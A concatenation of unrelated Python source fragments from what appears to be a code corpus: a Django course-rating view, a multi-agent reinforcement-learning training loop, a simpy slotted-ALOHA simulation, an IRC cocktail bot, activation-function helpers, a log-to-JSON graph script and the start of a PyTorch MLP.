    if count != 0:  # avoid a divide by zero
        students = 0
        effect = 0.0
        rating = 0.0
        course = 0.0
        chal = 0.0
        learn = 0.0
        for fcq_obj in fcq:
            students += fcq_obj.size
            effect += fcq_obj.profEffect
            rating += fcq_obj.profRating
            course += fcq_obj.courseRating
            chal += fcq_obj.challenge
            learn += fcq_obj.learned
        # Averages across all FCQs, rounded for display.
        students = int(students / count)
        effect = round(effect / count, 2)
        rating = round(rating / count, 2)
        course = round(course / count, 2)
        chal = round(chal / count, 2)
        learn = round(learn / count, 2)
        ctx["numClasses"] = count
        ctx["avgSize"] = students
        ctx["avgEffect"] = effect
        ctx["avgRating"] = rating
        ctx["avgCourse"] = course
        ctx["avgChal"] = chal
        ctx["avgLearn"] = learn
        # Star score: mean of effect/rating/learned, penalized when the
        # course is more challenging than the professor is effective.
        stars = (effect + rating + learn) / 3
        if effect - chal < 0:
            stars += effect - chal
        ctx["stars"] = stars
        # Order FCQs newest-first, with semesters in calendar order.
        fcq = fcq.annotate(
            custom_order=Case(
                When(semester="Spring", then=Value(1)),
                When(semester="Summer", then=Value(2)),
                When(semester="Fall", then=Value(3)),
                output_field=IntegerField(),
            )
        ).order_by("-year", "-custom_order")
        ctx["fcq"] = fcq
        # Per-department FCQ counts for the pie chart.
        department_obj = (
            fcq.order_by().values_list("course__department__name").distinct()
        )
        departments = [x[0] for x in department_obj]
        deps = [["department", "count"]]
        for dep in departments:
            count = len(fcq.filter(course__department__name=dep))
            holder = [dep, count]
            deps.append(holder)
        ctx["pieData"] = deps
        # NOTE(review): subjects/subCount below are computed but never
        # added to ctx or otherwise used — confirm whether this is dead code.
        subject_obj = fcq.order_by().values_list("course__course_subject").distinct()
        subjects = [x[0] for x in subject_obj]
        subCount = []
        for sub in subjects:
            subCount.append(len(fcq.filter(course__course_subject=sub)))
    return render(request, "fcq/professor_detail.html", ctx)
|
23,546 | 872ce41f26dc44c6624b6dca24cbb078a6982592 | CustomError = 'Error'
def test() :
raise 'Error'
try :
test()
except CustomError :
print("Error!")
|
23,547 | 40c4ab490c868b7d0f4834b5ee97f22edcffffe1 | """
Training funcion for the Coin Game.
"""
import os
import numpy as np
import tensorflow as tf
import pdb
from . import logger
from .corrections import *
from .networks import *
from .utils import *
def update(mainPN, lr, final_delta_1_v, final_delta_2_v):
    """Apply gradient deltas to both agents' policy parameters.

    mainPN -- pair of policy networks exposing getparams()/setparams().
    lr -- learning-rate scalar applied to each (squeezed) delta.
    NOTE(review): the returned values of setparams() are bound but unused;
    presumably setparams applies the update eagerly — confirm before
    removing the assignments.
    """
    update_theta_1 = mainPN[0].setparams(
        mainPN[0].getparams() + lr * np.squeeze(final_delta_1_v))
    update_theta_2 = mainPN[1].setparams(
        mainPN[1].getparams() + lr * np.squeeze(final_delta_2_v))
def update_single(PN, lr, final_delta_v):
    """Apply a gradient delta to a single policy network's parameters.

    Same mechanics as update(), for one network only.
    """
    update_theta_1 = PN.setparams(
        PN.getparams() + lr * np.squeeze(final_delta_v))
def clone_update(mainPN_clone):
    """Attach opponent-model training ops to both clone networks.

    For each clone, builds the mean log-probability of the observed
    actions and a gradient-descent op that maximizes it (behavior
    cloning of the opponent's policy).
    """
    for i in range(2):
        mainPN_clone[i].log_pi_clone = tf.reduce_mean(
            mainPN_clone[i].log_pi_action_bs)
        mainPN_clone[i].clone_trainer = \
            tf.train.GradientDescentOptimizer(learning_rate=0.1)
        mainPN_clone[i].update = mainPN_clone[i].clone_trainer.minimize(
            -mainPN_clone[i].log_pi_clone, var_list=mainPN_clone[i].parameters)
def train(env, *, num_episodes, trace_length, batch_size,
corrections, opp_model, grid_size, gamma, hidden, bs_mul, lr,
welfare0, welfare1, punish=False,
mem_efficient=True, num_punish_episodes=1000):
#Setting the training parameters
batch_size = batch_size #How many experience traces to use for each training step.
trace_length = trace_length #How long each experience trace will be when training
y = gamma
num_episodes = num_episodes #How many episodes of game environment to train network with.
load_model = False #Whether to load a saved model.
path = "./drqn" #The path to save our model to.
n_agents = env.NUM_AGENTS
total_n_agents = n_agents
h_size = [hidden] * total_n_agents
max_epLength = trace_length+1 #The max allowed length of our episode.
summary_len = 20 #Number of episodes to periodically save for analysis
tf.reset_default_graph()
mainPN = []
mainPN_step = []
coopPN = []
coopPN_step = []
punishPN = []
punishPN_step = []
agent_list = np.arange(total_n_agents)
for agent in range(total_n_agents):
mainPN.append(
Pnetwork('main' + str(agent), h_size[agent], agent, env,
trace_length=trace_length, batch_size=batch_size,))
mainPN_step.append(
Pnetwork('main' + str(agent), h_size[agent], agent, env,
trace_length=trace_length, batch_size=batch_size,
reuse=True, step=True))
# Clones of the opponents
if opp_model:
mainPN_clone = []
for agent in range(total_n_agents):
mainPN_clone.append(
Pnetwork('clone' + str(agent), h_size[agent], agent, env,
trace_length=trace_length, batch_size=batch_size))
if punish: # Initialize punishment networks and networks for tracking cooperative updates
for agent in range(total_n_agents):
punishPN.append(Pnetwork('punish' + str(agent), h_size[agent], agent, env,
trace_length=trace_length, batch_size=batch_size, ))
punishPN_step.append(Pnetwork('punish' + str(agent), h_size[agent], agent, env,
trace_length=trace_length, batch_size=batch_size,
reuse=True, step=True))
coopPN = Pnetwork('coop' + str(1), h_size[1], 1, env,
trace_length=trace_length, batch_size=batch_size, )
coopPN_step = Pnetwork('coop' + str(1), h_size[1], 1, env,
trace_length=trace_length, batch_size=batch_size,
reuse=True, step=True)
if not mem_efficient:
cube, cube_ops = make_cube(trace_length)
else:
cube, cube_ops = None, None
if not opp_model:
corrections_func(mainPN, batch_size, trace_length, corrections, cube)
corrections_func(punishPN, batch_size, trace_length, corrections, cube)
if punish:
corrections_func_single(coopPN, batch_size, trace_length)
else:
corrections_func([mainPN[0], mainPN_clone[1]],
batch_size, trace_length, corrections, cube)
corrections_func([mainPN[1], mainPN_clone[0]],
batch_size, trace_length, corrections, cube)
corrections_func([mainPN[1], mainPN_clone[0]],
batch_size, trace_length, corrections, cube)
clone_update(mainPN_clone)
init = tf.global_variables_initializer()
# saver = tf.train.Saver(max_to_keep=5)
trainables = tf.trainable_variables()
#create lists to contain total rewards and steps per episode
jList = []
rList = []
aList = []
total_steps = 0
has_defected = False
time_to_punish = False
# Make a path for our model to be saved in.
if not os.path.exists(path):
os.makedirs(path)
episodes_run = np.zeros(total_n_agents)
episodes_run_counter = np.zeros(total_n_agents)
episodes_reward = np.zeros((total_n_agents, batch_size))
episodes_actions = np.zeros((total_n_agents, env.NUM_ACTIONS))
pow_series = np.arange(trace_length)
discount = np.array([pow(gamma, item) for item in pow_series])
discount_array = gamma**trace_length / discount
discount = np.expand_dims(discount, 0)
discount_array = np.reshape(discount_array,[1,-1])
with tf.Session() as sess:
# if load_model == True:
# print( 'Loading Model...')
# ckpt = tf.train.get_checkpoint_state(path)
# saver.restore(sess, ckpt.model_checkpoint_path)
sess.run(init)
if not mem_efficient:
sess.run(cube_ops)
sP = env.reset()
updated =True
for i in range(num_episodes):
a0_defected = False
a1_defected = False
episodeBuffer = []
for ii in range(n_agents):
episodeBuffer.append([])
np.random.shuffle(agent_list)
if n_agents == total_n_agents:
these_agents = range(n_agents)
else:
these_agents = sorted(agent_list[0:n_agents])
#Reset environment and get first new observation
sP = env.reset()
s = sP
trainBatch0 = [[], [], [], [], [], []]
trainBatch1 = [[], [], [], [], [], []]
coopTrainBatch1 = [[], [], [], [], [], []]
d = False
rAll = np.zeros((4))
aAll = np.zeros((env.NUM_ACTIONS * 2))
j = 0
# ToDo: need to track lstm states for main and punish nets
lstm_state = []
for agent in these_agents:
episodes_run[agent] += 1
episodes_run_counter[agent] += 1
lstm_state.append(np.zeros((batch_size, h_size[agent]*2)))
if punish:
lstm_coop_state = np.zeros((batch_size, h_size[1]*2))
while j < max_epLength:
lstm_state_old = lstm_state
if punish: lstm_coop_state_old = lstm_coop_state
j += 1
a_all = []
lstm_state = []
lstm_punish_state = []
for agent_role, agent in enumerate(these_agents):
# Actual actions and lstm states
# ToDo: separate lstm state for punish nets
if punish and time_to_punish:
a, lstm_punish_s = sess.run(
[
punishPN_step[agent].predict,
punishPN_step[agent].lstm_state_output
],
feed_dict={
punishPN_step[agent].state_input: s,
punishPN_step[agent].lstm_state: lstm_state_old[agent]
}
)
lstm_state.append(lstm_s)
a_all.append(a)
else:
a, lstm_s = sess.run(
[
mainPN_step[agent].predict,
mainPN_step[agent].lstm_state_output
],
feed_dict={
mainPN_step[agent].state_input: s,
mainPN_step[agent].lstm_state: lstm_state_old[agent]
}
)
lstm_state.append(lstm_s)
a_all.append(a)
# Cooperative actions and lstm states
if punish and agent == 1: # Assuming only agent 1 can be non-cooperative
a_coop, lstm_s_coop = sess.run(
[
coopPN_step.predict,
coopPN_step.lstm_state_output
],
feed_dict={
coopPN_step.state_input: s,
coopPN_step.lstm_state: lstm_coop_state_old
}
)
lstm_coop_state = lstm_s_coop
a_coop_all = a_coop
# ToDo: make sure the policies which are being compared are deterministic (i.e. account for
# ToDo: random seed where necessary
if punish and not time_to_punish and not has_defected:
if np.array_equal(a_coop, a_all[1]):
has_defected = False
else:
has_defected = True
# ToDo: need separate trainBatch for punishment?
# Add obs for policy network
trainBatch0[0].append(s)
trainBatch1[0].append(s)
trainBatch0[1].append(a_all[0])
trainBatch1[1].append(a_all[1])
# Add obs for coop network
# ToDo: update coop only if has_defected == False?
if punish:
coopTrainBatch1[0].append(s)
coopTrainBatch1[1].append(a_all[1])
a_all = np.transpose(np.vstack(a_all))
s1P,r,d = env.step(actions=a_all)
s1 = s1P
trainBatch0[2].append(r[0])
trainBatch1[2].append(r[1])
trainBatch0[3].append(s1)
trainBatch1[3].append(s1)
trainBatch0[4].append(d)
trainBatch1[4].append(d)
trainBatch0[5].append(lstm_state[0])
trainBatch1[5].append(lstm_state[1])
if punish:
coopTrainBatch1[2].append(s1) # Coop train batch doesn't have entry for rewards b/c welfare function
coopTrainBatch1[3].append(d)
coopTrainBatch1[4].append(lstm_coop_state)
total_steps += 1
for agent_role, agent in enumerate(these_agents):
episodes_reward[agent] += r[agent_role]
for index in range(batch_size):
r_pb = [r[0][index], r[1][index]]
if np.array(r_pb).any():
if r_pb[0] == 1 and r_pb[1] == 0:
rAll[0] += 1
elif r_pb[0] == 0 and r_pb[1] == 1:
rAll[1] += 1
elif r_pb[0] == 1 and r_pb[1] == -2:
rAll[2] += 1
elif r_pb[0] == -2 and r_pb[1] == 1:
rAll[3] += 1
aAll[a_all[0]] += 1
aAll[a_all[1] + 4] += 1
s_old = s
s = s1
sP = s1P
if d.any():
break
jList.append(j)
rList.append(rAll)
aList.append(aAll)
# training after one batch is obtained
sample_return0 = np.reshape(
get_monte_carlo(trainBatch0[2], y, trace_length, batch_size),
[batch_size, -1])
sample_return1 = np.reshape(
get_monte_carlo(trainBatch1[2], y, trace_length, batch_size),
[batch_size, -1])
if punish and time_to_punish:
sample_return0 = -sample_return1
else:
sample_return0 = welfare0(sample_return0, sample_return1)
sample_return1 = welfare1(sample_return1, sample_return0)
# need to multiple with
pow_series = np.arange(trace_length)
discount = np.array([pow(gamma, item) for item in pow_series])
sample_reward0 = discount * np.reshape(
trainBatch0[2] - np.mean(trainBatch0[2]), [-1, trace_length])
sample_reward1 = discount * np.reshape(
trainBatch1[2]- np.mean(trainBatch1[2]), [-1, trace_length])
# ToDo: Check that calculation of rewards and returns are correct given how they're used
if punish and time_to_punish:
sample_reward0 = -sample_reward1
else:
sample_reward0 = welfare0(sample_reward0, sample_reward1)
sample_reward1 = welfare1(sample_reward1, sample_reward0)
state_input0 = np.concatenate(trainBatch0[0], axis=0)
state_input1 = np.concatenate(trainBatch1[0], axis=0)
actions0 = np.concatenate(trainBatch0[1], axis=0)
actions1 = np.concatenate(trainBatch1[1], axis=0)
last_state = np.reshape(
np.concatenate(trainBatch1[3], axis=0),
[batch_size, trace_length, env.ob_space_shape[0],
env.ob_space_shape[1], env.ob_space_shape[2]])[:,-1,:,:,:]
# ToDo: should be option for updating punishPN if punish==True
value_0_next, value_1_next = sess.run(
[mainPN_step[0].value, mainPN_step[1].value],
feed_dict={
mainPN_step[0].state_input: last_state,
mainPN_step[1].state_input: last_state,
mainPN_step[0].lstm_state: lstm_state[0],
mainPN_step[1].lstm_state: lstm_state[1],
})
if punish:
value_coop_next = sess.run(
coopPN_step.value,
feed_dict={coopPN_step.state_input: last_state,
coopPN_step.lstm_state: lstm_coop_state}
)
# if opp_model:
# ## update local clones
# update_clone = [mainPN_clone[0].update, mainPN_clone[1].update]
# feed_dict = {
# mainPN_clone[0].state_input: state_input1,
# mainPN_clone[0].actions: actions1,
# mainPN_clone[0].sample_return: sample_return1,
# mainPN_clone[0].sample_reward: sample_reward1,
# mainPN_clone[1].state_input: state_input0,
# mainPN_clone[1].actions: actions0,
# mainPN_clone[1].sample_return: sample_return0,
# mainPN_clone[1].sample_reward: sample_reward0,
# mainPN_clone[0].gamma_array: np.reshape(discount,[1,-1]),
# mainPN_clone[1].gamma_array: np.reshape(discount,[1,-1]),
# }
# num_loops = 50 if i == 0 else 1
# for i in range(num_loops):
# sess.run(update_clone, feed_dict=feed_dict)
# theta_1_vals = mainPN[0].getparams()
# theta_2_vals = mainPN[1].getparams()
# theta_1_vals_clone = mainPN_clone[0].getparams()
# theta_2_vals_clone = mainPN_clone[1].getparams()
# if len(rList) % summary_len == 0:
# print('params check before optimization')
# print('theta_1_vals', theta_1_vals)
# print('theta_2_vals_clone', theta_2_vals_clone)
# print('theta_2_vals', theta_2_vals)
# print('theta_1_vals_clone', theta_1_vals_clone)
# print('diff between theta_1 and theta_2_vals_clone',
# np.linalg.norm(theta_1_vals - theta_2_vals_clone))
# print('diff between theta_2 and theta_1_vals_clone',
# np.linalg.norm(theta_2_vals - theta_1_vals_clone))
# Update policy networks
if punish and time_to_punish:
network_to_update = punishPN
else:
network_to_update = mainPN
feed_dict={
network_to_update[0].state_input: state_input0,
network_to_update[0].sample_return: sample_return0,
network_to_update[0].actions: actions0,
network_to_update[1].state_input: state_input1,
network_to_update[1].sample_return: sample_return1,
network_to_update[1].actions: actions1,
network_to_update[0].sample_reward: sample_reward0,
network_to_update[1].sample_reward: sample_reward1,
network_to_update[0].gamma_array: np.reshape(discount, [1, -1]),
network_to_update[1].gamma_array: np.reshape(discount, [1, -1]),
network_to_update[0].next_value: value_0_next,
network_to_update[1].next_value: value_1_next,
network_to_update[0].gamma_array_inverse:
np.reshape(discount_array, [1, -1]),
network_to_update[1].gamma_array_inverse:
np.reshape(discount_array, [1, -1]),
}
# if opp_model:
# feed_dict.update({
# mainPN_clone[0].state_input:state_input1,
# mainPN_clone[0].actions: actions1,
# mainPN_clone[0].sample_return: sample_return1,
# mainPN_clone[0].sample_reward: sample_reward1,
# mainPN_clone[1].state_input:state_input0,
# mainPN_clone[1].actions: actions0,
# mainPN_clone[1].sample_return: sample_return0, # This is what forms the target of the PNetwork
# mainPN_clone[1].sample_reward: sample_reward0,
# mainPN_clone[0].gamma_array: np.reshape(discount,[1,-1]),
# mainPN_clone[1].gamma_array: np.reshape(discount,[1,-1]),
# })
values, _, _, update1, update2 = sess.run(
[
network_to_update[0].value,
network_to_update[0].updateModel,
network_to_update[1].updateModel,
network_to_update[0].delta,
network_to_update[1].delta,
],
feed_dict=feed_dict)
update(network_to_update, lr, update1 / bs_mul, update2 / bs_mul)
updated = True
print('update params')
# Update cooperative policy network
if punish and not time_to_punish:
feed_dict = {
coopPN.state_input: state_input1,
coopPN.sample_return: sample_return0, # Assuming returns for agent 0 are given by welfare fn
coopPN.actions: actions1,
coopPN.sample_reward: sample_reward0, # Assuming returns for agent 0 are given by welfare fn
coopPN.gamma_array: np.reshape(discount, [1, -1]),
coopPN.next_value: value_coop_next,
coopPN.gamma_array_inverse:
np.reshape(discount_array, [1, -1]),
}
values, _, update_coop = sess.run(
[
coopPN.value,
coopPN.updateModel,
coopPN.delta
],
feed_dict=feed_dict)
update_single(coopPN, lr, update_coop) # ToDo: change update to accomodate None
episodes_run_counter[agent] = episodes_run_counter[agent] * 0
episodes_actions[agent] = episodes_actions[agent] * 0
episodes_reward[agent] = episodes_reward[agent] * 0
# Update punishment tracking
if punish and time_to_punish:
punish_episode_counter -= 1
if punish_episode_counter == 0:
time_to_punish = False
else:
if has_defected:
time_to_punish = True
punish_episode_counter = num_punish_episodes
if len(rList) % summary_len == 0 and len(rList) != 0 and updated:
updated = False
print(total_steps, 'reward', np.sum(rList[-summary_len:], 0))
rlog = np.sum(rList[-summary_len:], 0)
for ii in range(len(rlog)):
logger.record_tabular('rList['+str(ii)+']', rlog[ii])
logger.dump_tabular()
logger.info('')
|
23,548 | eb8138b479f0a106216041926c3e78ed4d7adbd7 | from math import floor, log
def find(list_a, list_b):
    """Return every (index_a, index_b) pair whose elements in the two lists compare equal."""
    pairs = []
    for index_a, item_a in enumerate(list_a):
        for index_b, item_b in enumerate(list_b):
            if item_a == item_b:
                pairs.append((index_a, index_b))
    return pairs
def bin_to_dec(string):
    """Parse a base-2 digit string (e.g. '1011') into its integer value."""
    value = int(string, base=2)
    return value
def dec_to_bin(i):
    """Return the binary-digit string of integer ``i`` (no '0b' prefix).

    Uses ``format(i, 'b')`` instead of ``bin(i)[2:]``: for a negative input,
    ``bin(-5)`` is ``'-0b101'``, so slicing off two characters produced the
    garbled ``'b101'``.  ``format`` yields ``'-101'``; non-negative results
    are unchanged.
    """
    return format(i, 'b')
def cut_list(list):
    """Truncate ``list`` to the largest power-of-two length that fits inside it."""
    keep = 2 ** k_num(list=list)
    return list[:keep]
def k_num(list):
    """Return floor(log2(len(list))): the largest k with 2**k <= len(list).

    Computed with ``int.bit_length()`` instead of ``floor(log(n, 2))``:
    float log can round just below an exact integer for large powers of
    two, which would yield an off-by-one result.  Raises ValueError on an
    empty list, matching the math-domain ValueError ``log(0, 2)`` raised.
    """
    n = len(list)
    if n < 1:
        raise ValueError("k_num() requires a non-empty list")
    return n.bit_length() - 1
|
23,549 | 22d624f050c3661c9f39699eb439901931d3c22c | """ slotted aloha simulation through simpy """
# importing libraries
import simpy
import random
#defining constants
UPPER_LIMIT=1000
TIMEOUT=100
SLOT_TIME=10
MIN_PROCESS=10
MAX_PROCESS=20
MEAN=10
FRAME_TIME=5 #or transmission-time(time taken to generate a frame)
TOT_STATION=3
SIM_TIME=1000
SEED_VALUE=43
e=2.71828
# defining station
def station(env,stno,mpipe,ackpipe,timeout,upper_limit):
    """simpy process for one sender station.

    Repeatedly transmits a frame at a random slot boundary, then polls up
    to the remaining *timeout* budget for its acknowledgement; on timeout
    it retransmits until *upper_limit* is exhausted.

    Args:
        env: simpy Environment driving the simulation clock.
        stno: 1-based station number, also used as the ack token.
        mpipe: shared Store carrying (station number, text) tuples.
        ackpipe: shared Store on which the receiver posts station numbers.
        timeout: per-attempt ack wait budget in simulation time units.
        upper_limit: overall retransmission budget for this station.
    """
    while upper_limit>=0:
        while timeout>=0:
            flag=False
            # Wait until a random SLOT_TIME-aligned boundary (slotted ALOHA).
            t=random.randrange(0,100,SLOT_TIME)
            yield env.timeout(t)
            # The station's retransmission timer starts from here.
            print("message sent from station %d at : %f"%(stno,env.now))
            message=(stno,"%d send the message at %f"%(stno,env.now))
            yield env.timeout(FRAME_TIME)
            timeout-=FRAME_TIME
            mpipe.put(message)
            # Poll for our ack (the receiver posts our station number) until
            # the timeout budget runs out.
            while True:
                if timeout<=0:
                    break
                if ackpipe.items and (ackpipe.items[0]==stno):
                    ack=yield ackpipe.get()
                    flag=True
                    break
                else:
                    yield env.timeout(1)
                    timeout-=1
            if flag==True:
                print("ack received at station %d at : %f"%(stno,env.now))
                break
            else:
                print("timeout of station %d ,initiating retransmission at : %f"%(stno,env.now))
        # NOTE(review): timeout is <= 0 when we get here, so this barely
        # decreases upper_limit — confirm the intended budget accounting.
        upper_limit-=timeout
        if flag==True:
            break
#defining receiver
def reciver(env,mpipe,ackpipe,mx):
    """simpy process for the receiver: consume one message, then ack it.

    Discards every queued packet when more than one is waiting (a
    collision), records the latest message-arrival time in mx[0] for the
    traffic computation in main(), and after a random processing delay
    posts the sender's station number on ackpipe.  (Name kept as
    'reciver' (sic) because callers reference it.)
    """
    # Destroy the packets when more than one arrived at a time (collision).
    k=len(mpipe.items)
    if k>1:
        mpipe.items=[]
        print("%d packet_destroyed at %f"%(k,env.now))
    message=yield mpipe.get()
    print("message from station %d received at receiver : %f "%(message[0],env.now))
    # Track the latest arrival time; main() reads mx[0] after the run.
    mx[0]=max(env.now,mx[0])
    process_time=random.uniform(MIN_PROCESS,MAX_PROCESS)
    yield env.timeout(process_time)
    #print("station %d message's process time %f"%(message[0],process_time))
    print("acknowledgement %d sent from reciver at : %f"%(message[0],env.now))
    ackpipe.put(message[0])
#defining main()
def main():
    """Wire up the sender and receiver processes, run the simulation, then
    report normalized channel traffic (G) and throughput (S)."""
    random.seed(SEED_VALUE)
    environment = simpy.Environment()
    message_pipe = simpy.Store(environment)
    ack_pipe = simpy.Store(environment)
    last_arrival = [0.0]
    # Register all stations first, then the receiver processes, preserving
    # the original registration order (simpy scheduling depends on it).
    for station_no in range(TOT_STATION):
        environment.process(station(environment, station_no + 1, message_pipe,
                                    ack_pipe, TIMEOUT, UPPER_LIMIT))
    for _ in range(TOT_STATION):
        environment.process(reciver(environment, message_pipe, ack_pipe, last_arrival))
    environment.run(until=SIM_TIME)
    # Normalized channel traffic: arrival rate times frame (transmission) time.
    arrival_rate = TOT_STATION / last_arrival[0]
    G = arrival_rate * FRAME_TIME
    # Slotted-ALOHA throughput model: S = G * e^-G.
    S = G * (e ** (-G))
    print("\n\n")
    print("NORMALIZED CHANNEL TRAFFIC : %f" % (G))
    print("THROUGHPUT : %f" % (S))
if __name__ == "__main__":
    main()
|
def reverse_elements(number_list, current_position, length):
    """Reverse a run of ``length`` elements starting at ``current_position``,
    treating the list as circular, and return the result as a new list.
    A run of length 0 or 1 is returned unchanged.
    """
    if length <= 1:
        return number_list
    size = len(number_list)
    # Circular indices covered by the run, in order.
    positions = [(current_position + offset) % size for offset in range(length)]
    run_values = [number_list[pos] for pos in positions]
    result = list(number_list)
    # Write the run back in reverse order at the same circular positions.
    for pos, value in zip(positions, reversed(run_values)):
        result[pos] = value
    return result
|
23,551 | 1a5a62ed88139f6bfa3708c1d75e9e30e7b3a1e0 |
from irc import *
from cocktaildb import *
channel = "#pbzweihander"
server = "irc.uriirc.org"
port = 16664
nickname = "bartender-bot"
irc = IRC()
def main():
    """Connect to the configured IRC server and dispatch incoming lines.

    Runs forever: answers server PINGs, follows channel invites, logs every
    received line, and routes PRIVMSG commands to handle().
    """
    global irc
    irc.init()
    irc.connect(server, port, channel, nickname)
    while True:
        lines = irc.get_text()
        for text in lines:
            if not text:
                continue
            if 'PING ' in text:  # reply when the server requests a ping
                irc.raw_send('PONG ' + text.split()[1])
            if 'INVITE ' in text:  # follow when a user invites us to a channel
                irc.join(text.split(':', 2)[-1])
            print("[r] " + text)  # log
            if 'PRIVMSG ' in text:
                chan = text.split("PRIVMSG ")[1].split()[0]
                sender = text.split("!")[0][1:]
                msg = text.split(":", 2)[2]
                if "#" not in chan:  # a query (direct message), not a channel message
                    chan = sender
                handle(chan, msg)
def handle(chan: str, msg: str):
    """Parse a command message and send the lookup result back to *chan*.

    Recognized prefixes: c?/cs?/cd? query the cocktail database,
    i?/is?/id? query ingredients; 'c?random' picks a random cocktail.
    An empty lookup result is answered with the '._.' placeholder.
    """
    # The prefixes are mutually exclusive, so table order does not matter.
    commands = (
        ('c?', lambda name: random_cocktails() if name == 'random' else find_cocktails(name)),
        ('cs?', lambda name: find_cocktails(name, True, False)),
        ('cd?', lambda name: find_cocktails(name, False, True)),
        ('i?', lambda name: find_ingredient(name)),
        ('is?', lambda name: find_ingredient(name, True, False)),
        ('id?', lambda name: find_ingredient(name, False, True)),
    )
    reply = ''
    for prefix, lookup in commands:
        if msg.startswith(prefix):
            name = msg.split('?')[1].strip()
            if name:
                reply = lookup(name) or '._.'
            break
    if reply:
        # A multi-line result is sent as one IRC message per line;
        # a single-line result splits into itself.
        for line in reply.split('\n'):
            irc.send(chan, line)
if __name__ == '__main__':
main()
|
23,552 | 3f53f6cc2a3e068f9b0b37b42cc2408bc92f306e | # Copyright (c) Microsoft. All rights reserved.
import torch
import math
from torch.nn.functional import tanh, relu, prelu, leaky_relu, sigmoid, elu, selu
from torch.nn.init import uniform, normal, eye, xavier_uniform, xavier_normal, kaiming_uniform, kaiming_normal, orthogonal
def linear(x):
    """Identity activation: returns the input unchanged."""
    return x
def swish(x):
    """Swish activation: x * sigmoid(x)."""
    gate = sigmoid(x)
    return x * gate
def bertgelu(x):
    """Exact GELU (erf form), as used by BERT: x * Phi(x)."""
    erf_term = torch.erf(x / math.sqrt(2.0))
    return x * 0.5 * (1.0 + erf_term)
def gptgelu(x):
    """GELU, tanh approximation as used by GPT."""
    inner = math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))
    return 0.5 * x * (1 + torch.tanh(inner))
# default GELU implementation
gelu = bertgelu
def activation(func_a):
    """Resolve an activation-function name to the callable it denotes.

    Evaluates *func_a* in this module's namespace (e.g. 'relu', 'gelu',
    'swish'); anything that fails to resolve falls back to the identity
    ``linear``.  NOTE(security): this uses eval() on the string — pass only
    trusted, config-controlled names.
    """
    try:
        f = eval(func_a)
    except Exception:
        # Unknown or invalid name: degrade gracefully to the identity
        # activation, as before — but unlike the original bare `except:`,
        # no longer swallowing KeyboardInterrupt/SystemExit.
        f = linear
    return f
def init_wrapper(init='xavier_uniform'):
    """Resolve a weight-initializer name (default 'xavier_uniform') to one of
    the initializer functions imported above.  NOTE(security): uses eval();
    pass only trusted names."""
    return eval(init)
|
23,553 | 45107331f45352fc6b9ad0ecb057bd9135fe0ea1 | import sys, getopt
import os
import shutil
import re
def main(argv):
simlog = ''
startcycle = 0
endcycle = 0
try:
opts, args = getopt.getopt(argv, "hi:s:e:", ["input=", "start=", "end="])
except getopt.GetoptError:
print 'Usage: python graphSimLog.py --input sim.log --start startcycle --end endcycle'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'Usage: python graphSimLog.py --input sim.log --start startcycle --end endcycle'
sys.exit()
elif opt in ("-i", "--input"):
simlog = arg
elif opt in ("-s", "--start"):
startcycle = int(arg)
elif opt in ("-e", "--end"):
endcycle = int(arg)
logInput = open(simlog, 'r').readlines()
jsonout = open("data.json", 'w')
events = []
#We need to find all load printfs: see example below
## Cycle: 29727 Time: 594590 ListAverage_pSlice - LD 0x2000000
for line in logInput:
regex = "# Cycle:\W*([0-9]+)\W+Time:\W*[0-9]+\W*([A-z]+)\W-\W([A-z]+[0-9]*)\W+0x([A-z0-9]+)"
m = re.search(regex,line)
if m:
event_element =[]
event_element.append(int(m.group(1)))
sliceRE = "\w*_pSlice"
ms = re.search(sliceRE, m.group(2))
if ms:
event_element.append(True)
else:
event_element.append(False)
event_element.append(m.group(3))
event_element.append(m.group(4))
if startcycle != 0 or endcycle != 0:
if event_element[0] > startcycle and event_element[0] < endcycle:
events.append(event_element)
else:
events.append(event_element)
links = []
pos = 0
for event in events:
if event[1]:
addr = event[3]
ldName = event[2]
linkStart = event[0]
found = False
for linkSearch in events:
if not linkSearch[1]: #Pslice event
if addr == linkSearch[3]:
if ldName == linkSearch[2]:
if not found:
if linkSearch[0] == linkStart:
found = True
if linkSearch[0] > linkStart:
add_link =[]
add_link.append(linkStart)
add_link.append(linkSearch[0])
links.append(add_link)
found = True
#Write data.json file
outs = "{\n"
#Write out the nodes
outs += "\t\"nodes\":[\n"
for e in events:
outs += "\t\t{\"name\":\""+e[2]
if e[1]:
outs += "\",\"group\":0"
else:
outs += "\",\"group\":1"
outs += ",\"time\":"+str(e[0])
outs += ",\"addr\":\""+str(e[3])+"\""
outs += "},\n"
outs = outs[:-2]
outs += "\n\t],\n"
#write out the links
outs += "\t\"links\":[\n"
if links:
for l in links:
outs += "\t\t{\"source\":" +str(l[0])+",\"target\":"+str(l[1])+",\"value\":1},\n"
outs = outs[:-2]
outs += "\n\t],\n"
#Write out startTime and endTime
outs += "\t\"startTime\":" + str(events[0][0]) + ",\n"
outs += "\t\"endTime\":" + str(events[-1][0]) + ",\n"
outs += "\t\"startLink\":" +str(links[0][1] - links[0][0])+",\n"
outs += "\t\"endLink\":"+str(links[-1][1] - links[-1][0])+"\n"
outs += "}"
jsonout.write(outs)
jsonout.close()
python_dir = os.path.dirname(os.path.realpath(__file__))
shutil.copytree(python_dir + "/_d3graph", "./_d3graph")
shutil.move("./data.json", "./_d3graph/data.json")
if __name__ == "__main__":
main(sys.argv[1:])
|
23,554 | 8c6e41149e26d01c22988571ebfaabd3e16fd11c | import torch
import torch.nn as nn
from models.custom import SizeableModule, NamedModule, WeightInitializableModule
class MLP(SizeableModule, NamedModule, WeightInitializableModule):
    """Multi Layer Perceptron

    Flattens a (B, 2, 14, 14) input pair, pushes it through four fully
    connected layers with ReLU + dropout, and emits a sigmoid probability
    per sample.

    Attributes:
        fc1 (nn.Linear): first fully connected linear layer, (2*14*14) -> 128
        fc2 (nn.Linear): second fully connected linear layer, 128 -> 98
        fc3 (nn.Linear): third fully connected linear layer, 98 -> 49
        fc4 (nn.Linear): fourth fully connected linear layer, 49 -> 10
        classifier (nn.Linear): classifier head, 10 -> 1
        drop (nn.Dropout): dropout with p=0.2 applied after fc1-fc3
        relu (nn.ReLU): hidden-layer activation
        sigmoid (nn.Sigmoid): output activation squashing the logit to ]0,1[
    """
    def __init__(self):
        super(MLP, self).__init__()
        self.fc1 = nn.Linear(2 * 14 * 14, 128)
        self.fc2 = nn.Linear(128, 98)
        self.fc3 = nn.Linear(98, 49)
        self.fc4 = nn.Linear(49, 10)
        self.classifier = nn.Linear(10, 1)
        # dropout layer
